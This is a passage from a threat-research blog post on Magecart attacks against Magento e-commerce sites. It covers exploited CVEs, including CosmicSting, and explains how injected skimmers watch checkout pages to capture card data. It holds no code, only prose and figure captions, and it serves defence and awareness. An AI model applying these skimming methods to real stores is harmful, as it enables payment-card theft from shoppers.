The State of Magecart: A Persistent Threat to E-Commerce Security

Trustwave SpiderLabs first blogged about Magecart back in 2019; fast forward five years and it is still here going strong.

During the pre-holiday season, cybercriminals ramped up their efforts to target e-commerce websites, aiming to steal cardholder and personal information. These attacks, collectively known as Magecart, have been active since 2015, named after the Magento e-commerce platform with "cart" referencing shopping carts — their initial primary targets.

Magecart attacks have persisted due to the widespread use of the Magento platform, which powers numerous online stores worldwide. The pandemic further fuelled the group's activity, as the global shift to online shopping presented an expanded attack surface. In this blog, we will discuss what we have recently seen, explore the attack methodology, and the current state of Magecart threats.

Attack Methodology

Magecart attacks typically follow a structured approach:

Figure 1. A typical Magecart attack flow

Initial Compromise

Attackers often gain unauthorized access to a website by exploiting vulnerabilities in the e-commerce platform, its infrastructure, or compromised third-party services. They may exploit unpatched vulnerabilities in Magento websites, but it is also common for them to target third-party vendors with weaker security. Other methods include brute-forcing admin credentials or taking advantage of misconfigurations in the website or its supporting systems.

Threat actors have exploited several known vulnerabilities (CVEs) in e-commerce platforms, with Magento being a frequent target. Below is a notable Magento vulnerability that was exploited in 2024:

• CVE-2024-20720 - This critical command injection vulnerability in Adobe Magento, first identified in February 2024, was observed being actively exploited in the wild by April, as reported by Sansec. With a CVSS score of 9.1, this flaw allowed attackers to execute arbitrary system commands without requiring user interaction. Magecart attackers exploited this vulnerability to insert persistent backdoors into compromised websites that allowed unauthorized access and data theft.
• CosmicSting (CVE-2024-34102 and CVE-2024-2961) - This was one of the most widespread attacks of the year, impacting 75% of Adobe Commerce and Magento platforms and compromising thousands of e-commerce websites. The attack exploited CVE-2024-34102 to access sensitive files, such as configuration files containing encryption keys, and then used CVE-2024-2961 to escalate privileges and to allow full system compromise. These vulnerabilities allow attackers to execute remote code execution (RCE), modify content management system (CMS) blocks, inject malicious scripts (e.g., skimmers), and install persistent backdoors for long-term control over affected systems.

According to Sansec, e-commerce stores were being hacked at the alarming rate of five to 30 sites per hour during this attack’s campaign.

Figure 2. A snippet of the skimmer's data exfiltration code was injected into Cisco’s e-commerce website in September 2024, which is believed to have been compromised using the CosmicSting vulnerability.

Skimmer Injection

Skimmer codes are injected by attackers depending on the opportunities and services available to them. They may insert the code directly into checkout pages or spread it across multiple pages of the website, with a primary focus on monitoring checkout pages. The code typically identifies these pages by checking if the URL path contains keywords such as "checkout" or "onepage". Once the target page is detected, the skimmer captures user inputs on payment forms, including sensitive data such as credit card numbers, CVVs, and billing details.

Figure 3. A malicious JavaScript code is injected to load an external JS script whenever the HREF location contains the strings “checkout” or “onepage.” Once triggered, the external script monitors the input fields on the page, enabling card skimming and the exfiltration of sensitive data.

At the height of the pandemic in 2020, attackers were observed injecting malicious code into a compromised e-commerce site’s Magento global configuration, causing the code to load on every page each time a user accesses the website. Figure 4 illustrates Magento’s design configuration page, where administrators can customize the footer section of the webpage. This section is typically used to define the copyright notice, but it also allows for the insertion of a